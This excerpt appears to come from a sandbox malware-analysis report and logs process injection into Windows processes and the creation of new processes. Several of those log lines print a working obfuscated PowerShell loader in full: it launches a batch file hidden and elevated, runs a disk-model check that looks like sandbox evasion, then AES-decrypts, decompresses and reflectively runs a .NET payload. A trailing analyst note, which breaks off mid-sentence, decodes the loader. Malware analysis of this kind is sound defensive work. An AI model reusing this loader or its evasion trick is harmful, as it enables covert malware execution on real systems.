        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1150000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2350000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2980000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: F30000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: C60000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7D0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2610000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1380000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2200000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DA0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 24B0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: B60000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 930000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12D0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 6F0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AB0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11C0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2240000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 11E0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: CB0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 780000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1FD0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2400000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 7E0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2D50000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 26F0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: AF0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 14E0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 9E0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: EF0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: A60000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 12A0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1200000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: ED0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B10000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 860000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2B60000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2AD0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2EA0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 1000000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2BE0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: FD0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files (x86)\OfeRfxJVYCSEkFZPVOSAujvWfRaywuOLxKXKAiUGDsBRlsVfmPQcXNTKgEYpaXwCyBaAvptrObBIxRG\6m1AGPB0oUcUvCHlaEG.exe base: 2DC0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 18D132A0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\cmd.exe base: 1B780BB0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\conhost.exe base: 264072F0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C5BFFD0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E1AE450000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220450000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\more.com base: 234FE4F0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2693C0E0000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\conhost.exe base: 1AAD1C40000
        Source: C:\Windows\System32\winlogon.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1A42C600000
        Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 15220360000
        Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 17A37950000
        Source: C:\Windows\System32\lsass.exe | Memory written: C:\Windows\System32\svchost.exe base: 2C5BFFA0000
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "Start-Process -FilePath 'C:\Users\user\Desktop\skf7iF4.bat' -ArgumentList 'sgcCUaUFtA' -WindowStyle Hidden -Verb RunAs"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\Desktop\skf7iF4.bat" sgcCUaUFtA
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((Get-WmiObject Win32_DiskDrive | Select-Object -ExpandProperty Model | findstr /i 'WDS100T2B0A') -and (-not (Get-ChildItem -Path F:\ -Recurse | Where-Object { -not $_.PSIsContainer } | Measure-Object).Count)) {exit 900} else {exit 1}"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ixMY($RTJl){ Invoke-Expression -Verbose '$lYya=[kQSkQykQstkQekQm.kQSkQekQckQukQrkQikQtkQykQ.kQCrkQykQpkQtokQgrkQakQphkQykQ.kQAekQskQ]:kQ:CkQrkQekQakQtekQ(kQ);'.Replace('kQ', ''); Invoke-Expression -WarningAction Inquire -Debug -InformationAction Ignore -Verbose '$lYya.M7ko7kd7ke=7k[7kSy7ks7kt7ke7km7k.7kS7ke7kc7ku7kri7kt7ky7k.C7kry7kp7kto7kg7kr7kap7kh7ky.7kCi7kp7kh7ke7krM7ko7kd7ke]7k:7k:C7kB7kC;'.Replace('7k', ''); Invoke-Expression -InformationAction Ignore '$lYya.PUPaUPdUPdiUPnUPg=UP[UPSUPyUPsUPtUPeUPmUP.UPSUPecUPuUPrUPitUPy.UPCUPryUPpUPtUPogUPrUPapUPhyUP.UPPUPaUPddUPiUPnUPgMUPoUPdeUP]UP::UPPUPKUPCUPS7UP;'.Replace('UP', ''); Invoke-Expression -Verbose '$lYya.KF4eF4yF4=[F4SF4ysF4tF4eF4mF4.F4CF4oF4nF4vF4eF4rtF4]F4:F4:FF4roF4mF4BaF4sF4eF464F4SF4trF4inF4g("6F4iF4nF4QTF4VF4f6F4kF4MF4fF4iF4uF49F40F4mF4wF4KaF4ZF48F4tDF482F4BF4yTF4DF4CF4HNF4RF4PsF4BFF42F4gF4fF4mFF4QF4=");'.Replace('F4', ''); Invoke-Expression -Debug -Verbose -InformationAction Ignore -WarningAction Inquire '$lYya.IcuVcu=cu[Scuycustcuecumcu.cuCcuocuncuvcuecurcut]cu:cu:cuFrcuomcuBcuascuecu6cu4Scutcuricungcu("OcuQcufcuEscuocuBxcu6cufcuucuHcuocuGcu2cuocu+cubrcu8curcuQ=cu=");'.Replace('cu', ''); $kxIY=$lYya.CreateDecryptor(); $uoEQ=$kxIY.TransformFinalBlock($RTJl, 0, $RTJl.Length); $kxIY.Dispose(); $lYya.Dispose(); $uoEQ;}function eaLU($RTJl){ Invoke-Expression -Debug -Verbose -WarningAction Inquire -InformationAction Ignore '$QqUU=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm(,$RTJl);'.Replace('gZ', ''); Invoke-Expression -WarningAction Inquire '$JLmq=NgZegZwgZ-OgZbgZjegZcgZtgZ gZSgZygZsgZtgZegZmgZ.IgZOgZ.gZMegZmogZrgZySgZtgZrgZeagZm;'.Replace('gZ', ''); Invoke-Expression -Debug -WarningAction Inquire -Verbose -InformationAction Ignore '$FcOM=NJVeJVwJV-OJVbJVjeJVcJVtJV JVSJVyJVsJVtJVeJVmJV.IJVOJV.JVCoJVmpJVrJVesJVsJViJVonJV.JVGZJVipJVSJVtJVrJVeaJVmJV($QqUU, [JVIJVOJV.CJVoJVmpJVrJVeJVsJVsJViJVoJVnJV.JVCJVomJVpJVrJVesJVsiJVoJVnMJVoJVdJVe]JV:JV:DJVecJVoJVmJVpJVreJVsJVs);'.Replace('JV', ''); $FcOM.CopyTo($JLmq); $FcOM.Dispose(); $QqUU.Dispose(); $JLmq.Dispose(); $JLmq.ToArray();}function asdm($RTJl,$dnWr){ Invoke-Expression -InformationAction Ignore -Verbose -Debug '$UMjh=[imSimyimstimeimm.imRimeimfimlimeimcimtimiimoimn.imAimsimseimmbimlimy]im:im:imLoimaimd([byte[]]$RTJl);'.Replace('im', ''); Invoke-Expression -InformationAction Ignore -Verbose -WarningAction Inquire -Debug '$mtQH=$UMjh.EIAnIAtIAryIAPIAoiIAnIAtIA;'.Replace('IA', ''); Invoke-Expression -Verbose -InformationAction Ignore -WarningAction Inquire -Debug '$mtQH.7yI7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnWr);'.Replace('7y', '');}function rfR($wdZq){ $registryPath = 'HKLM:\SOFTWARE\OOhhhm='; if (Test-Path $registryPath) { Remove-ItemProperty -Path $registryPath -Name * -Force } else { New-Item -Path $registryPath -Force; } Set-ItemProperty -Path $registryPath -Name 'Map' -Value 'YgRcXRGuMxdAM;gxWdtVB;oXRuvWNbW
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -NoProfile
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\more.com more
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\findstr.exe "C:\Windows\system32\findstr.exe" /i WDS100T2B0A
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((get-wmiobject win32_diskdrive | select-object -expandproperty model | findstr /i 'wds100t2b0a') -and (-not (get-childitem -path f:\ -recurse | where-object { -not $_.psiscontainer } | measure-object).count)) {exit 900} else {exit 1}"
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ixmy($rtjl){ invoke-expression -verbose '$lyya=[kqskqykqstkqekqm.kqskqekqckqukqrkqikqtkqykq.kqcrkqykqpkqtokqgrkqakqphkqykq.kqaekqskq]:kq:ckqrkqekqakqtekq(kq);'.replace('kq', ''); invoke-expression -warningaction inquire -debug -informationaction ignore -verbose '$lyya.m7ko7kd7ke=7k[7ksy7ks7kt7ke7km7k.7ks7ke7kc7ku7kri7kt7ky7k.c7kry7kp7kto7kg7kr7kap7kh7ky.7kci7kp7kh7ke7krm7ko7kd7ke]7k:7k:c7kb7kc;'.replace('7k', ''); invoke-expression -informationaction ignore '$lyya.pupaupdupdiupnupg=up[upsupyupsuptupeupmup.upsupecupuuprupitupy.upcupryuppuptupoguprupapuphyup.uppupaupddupiupnupgmupoupdeup]up::uppupkupcups7up;'.replace('up', ''); invoke-expression -verbose '$lyya.kf4ef4yf4=[f4sf4ysf4tf4ef4mf4.f4cf4of4nf4vf4ef4rtf4]f4:f4:ff4rof4mf4baf4sf4ef464f4sf4trf4inf4g("6f4if4nf4qtf4vf4f6f4kf4mf4ff4if4uf49f40f4mf4wf4kaf4zf48f4tdf482f4bf4ytf4df4cf4hnf4rf4psf4bff42f4gf4ff4mff4qf4=");'.replace('f4', ''); invoke-expression -debug -verbose -informationaction ignore -warningaction inquire '$lyya.icuvcu=cu[scuycustcuecumcu.cuccuocuncuvcuecurcut]cu:cu:cufrcuomcubcuascuecu6cu4scutcuricungcu("ocuqcufcuescuocubxcu6cufcuucuhcuocugcu2cuocu+cubrcu8curcuq=cu=");'.replace('cu', ''); $kxiy=$lyya.createdecryptor(); $uoeq=$kxiy.transformfinalblock($rtjl, 0, $rtjl.length); $kxiy.dispose(); $lyya.dispose(); $uoeq;}function ealu($rtjl){ invoke-expression -debug -verbose -warningaction inquire -informationaction ignore '$qquu=ngzegzwgz-ogzbgzjegzcgztgz gzsgzygzsgztgzegzmgz.igzogz.gzmegzmogzrgzysgztgzrgzeagzm(,$rtjl);'.replace('gz', ''); invoke-expression -warningaction inquire '$jlmq=ngzegzwgz-ogzbgzjegzcgztgz gzsgzygzsgztgzegzmgz.igzogz.gzmegzmogzrgzysgztgzrgzeagzm;'.replace('gz', ''); invoke-expression -debug -warningaction inquire -verbose -informationaction ignore '$fcom=njvejvwjv-ojvbjvjejvcjvtjv jvsjvyjvsjvtjvejvmjv.ijvojv.jvcojvmpjvrjvesjvsjvijvonjv.jvgzjvipjvsjvtjvrjveajvmjv($qquu, [jvijvojv.cjvojvmpjvrjvejvsjvsjvijvojvnjv.jvcjvomjvpjvrjvesjvsijvojvnmjvojvdjve]jv:jv:djvecjvojvmjvpjvrejvsjvs);'.replace('jv', ''); $fcom.copyto($jlmq); $fcom.dispose(); $qquu.dispose(); $jlmq.dispose(); $jlmq.toarray();}function asdm($rtjl,$dnwr){ invoke-expression -informationaction ignore -verbose -debug '$umjh=[imsimyimstimeimm.imrimeimfimlimeimcimtimiimoimn.imaimsimseimmbimlimy]im:im:imloimaimd([byte[]]$rtjl);'.replace('im', ''); invoke-expression -informationaction ignore -verbose -warningaction inquire -debug '$mtqh=$umjh.eianiatiaryiapiaoiianiatia;'.replace('ia', ''); invoke-expression -verbose -informationaction ignore -warningaction inquire -debug '$mtqh.7yi7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnwr);'.replace('7y', '');}function rfr($wdzq){ $registrypath = 'hklm:\software\oohhhm='; if (test-path $registrypath) { remove-itemproperty -path $registrypath -name * -force } else { new-item -path $registrypath -force; } set-itemproperty -path $registrypath -name 'map' -value 'ygrcxrgumxdam;gxwdtvb;oxruvwnbw
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe "if ((get-wmiobject win32_diskdrive | select-object -expandproperty model | findstr /i 'wds100t2b0a') -and (-not (get-childitem -path f:\ -recurse | where-object { -not $_.psiscontainer } | measure-object).count)) {exit 900} else {exit 1}"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function ixmy($rtjl){ invoke-expression -verbose '$lyya=[kqskqykqstkqekqm.kqskqekqckqukqrkqikqtkqykq.kqcrkqykqpkqtokqgrkqakqphkqykq.kqaekqskq]:kq:ckqrkqekqakqtekq(kq);'.replace('kq', ''); invoke-expression -warningaction inquire -debug -informationaction ignore -verbose '$lyya.m7ko7kd7ke=7k[7ksy7ks7kt7ke7km7k.7ks7ke7kc7ku7kri7kt7ky7k.c7kry7kp7kto7kg7kr7kap7kh7ky.7kci7kp7kh7ke7krm7ko7kd7ke]7k:7k:c7kb7kc;'.replace('7k', ''); invoke-expression -informationaction ignore '$lyya.pupaupdupdiupnupg=up[upsupyupsuptupeupmup.upsupecupuuprupitupy.upcupryuppuptupoguprupapuphyup.uppupaupddupiupnupgmupoupdeup]up::uppupkupcups7up;'.replace('up', ''); invoke-expression -verbose '$lyya.kf4ef4yf4=[f4sf4ysf4tf4ef4mf4.f4cf4of4nf4vf4ef4rtf4]f4:f4:ff4rof4mf4baf4sf4ef464f4sf4trf4inf4g("6f4if4nf4qtf4vf4f6f4kf4mf4ff4if4uf49f40f4mf4wf4kaf4zf48f4tdf482f4bf4ytf4df4cf4hnf4rf4psf4bff42f4gf4ff4mff4qf4=");'.replace('f4', ''); invoke-expression -debug -verbose -informationaction ignore -warningaction inquire '$lyya.icuvcu=cu[scuycustcuecumcu.cuccuocuncuvcuecurcut]cu:cu:cufrcuomcubcuascuecu6cu4scutcuricungcu("ocuqcufcuescuocubxcu6cufcuucuhcuocugcu2cuocu+cubrcu8curcuq=cu=");'.replace('cu', ''); $kxiy=$lyya.createdecryptor(); $uoeq=$kxiy.transformfinalblock($rtjl, 0, $rtjl.length); $kxiy.dispose(); $lyya.dispose(); $uoeq;}function ealu($rtjl){ invoke-expression -debug -verbose -warningaction inquire -informationaction ignore '$qquu=ngzegzwgz-ogzbgzjegzcgztgz gzsgzygzsgztgzegzmgz.igzogz.gzmegzmogzrgzysgztgzrgzeagzm(,$rtjl);'.replace('gz', ''); invoke-expression -warningaction inquire '$jlmq=ngzegzwgz-ogzbgzjegzcgztgz gzsgzygzsgztgzegzmgz.igzogz.gzmegzmogzrgzysgztgzrgzeagzm;'.replace('gz', ''); invoke-expression -debug -warningaction inquire -verbose -informationaction ignore '$fcom=njvejvwjv-ojvbjvjejvcjvtjv jvsjvyjvsjvtjvejvmjv.ijvojv.jvcojvmpjvrjvesjvsjvijvonjv.jvgzjvipjvsjvtjvrjveajvmjv($qquu, 
[jvijvojv.cjvojvmpjvrjvejvsjvsjvijvojvnjv.jvcjvomjvpjvrjvesjvsijvojvnmjvojvdjve]jv:jv:djvecjvojvmjvpjvrejvsjvs);'.replace('jv', ''); $fcom.copyto($jlmq); $fcom.dispose(); $qquu.dispose(); $jlmq.dispose(); $jlmq.toarray();}function asdm($rtjl,$dnwr){ invoke-expression -informationaction ignore -verbose -debug '$umjh=[imsimyimstimeimm.imrimeimfimlimeimcimtimiimoimn.imaimsimseimmbimlimy]im:im:imloimaimd([byte[]]$rtjl);'.replace('im', ''); invoke-expression -informationaction ignore -verbose -warningaction inquire -debug '$mtqh=$umjh.eianiatiaryiapiaoiianiatia;'.replace('ia', ''); invoke-expression -verbose -informationaction ignore -warningaction inquire -debug '$mtqh.7yi7yn7yvo7yk7ye(7y$7yn7yu7yl7yl7y, $dnwr);'.replace('7y', '');}function rfr($wdzq){ $registrypath = 'hklm:\software\oohhhm='; if (test-path $registrypath) { remove-itemproperty -path $registrypath -name * -force } else { new-item -path $registrypath -force; } set-itemproperty -path $registrypath -name 'map' -value 'ygrcxrgumxdam;gxwdtvb;oxruvwnbwJump to behavior
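Added analyst example, not part of the Joe Sandbox report or of the sample's own code: the loader in the process-creation lines above hides every .NET call inside invoke-expression of a string literal from which a two-character junk token is deleted with .replace('xx', ''). Applying the same deletion offline recovers the plain statements. ixmy builds [system.security.cryptography.aes] in CBC mode with PKCS7 padding, loads a base64 key and IV and runs transformfinalblock over its argument; ealu feeds the result through a gzipstream in decompress mode; asdm hands the bytes to [system.reflection.assembly]::load and invokes the assembly's entrypoint with $null plus a second argument; rfr writes a 'map' value under hklm:\software\oohhhm=. The WMI one-liner between the two cmd.exe entries is an 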